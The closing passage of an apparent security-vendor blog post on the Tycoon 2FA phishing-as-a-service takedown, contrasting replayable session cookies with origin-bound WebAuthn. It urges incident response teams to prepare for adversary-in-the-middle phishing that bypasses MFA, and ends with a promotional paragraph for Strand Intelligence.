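Contrast this with the cookie replay earlier in the post: a session cookie carries no record of where it was issued, so the identity provider cannot tell a relayed login from a real one, whereas a WebAuthn assertion names its origin inside the signed data and the browser will not even produce one for the wrong origin.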
Conclusion
The Tycoon 2FA takedown is a significant operational achievement - the result of sustained intelligence collection, cross-border law enforcement coordination, and public-private collaboration at a scale rarely seen in cybercrime disruption. The coalition's success in attributing the platform's developer, seizing its infrastructure, and achieving a measurable reduction in phishing volume demonstrates that even well-resourced PhaaS operations are not beyond reach.
But for DFIR teams, the work is just beginning. The threat actor ecosystem will adapt. The underlying attack technique is durable, well-understood, and implemented across a growing number of competing platforms. Organizations that treated MFA as the end state of their authentication security posture now face a clear and urgent requirement to evolve.
The question is no longer whether AitM phishing can bypass your MFA. It can. The question is whether your detection, investigation, and remediation capabilities are built for that reality, and where the threat actors will migrate to next (which won't take them long).
Strand Intelligence provides AI-powered digital forensics and incident response, delivering automated investigation capabilities for ransomware, BEC, and identity-based intrusions. For more on how Strand can help your team respond to AitM-driven compromises, visit strandintelligence.com.
Written by
Will
The Strand team specializes in digital forensics, incident response, and cybersecurity threat analysis.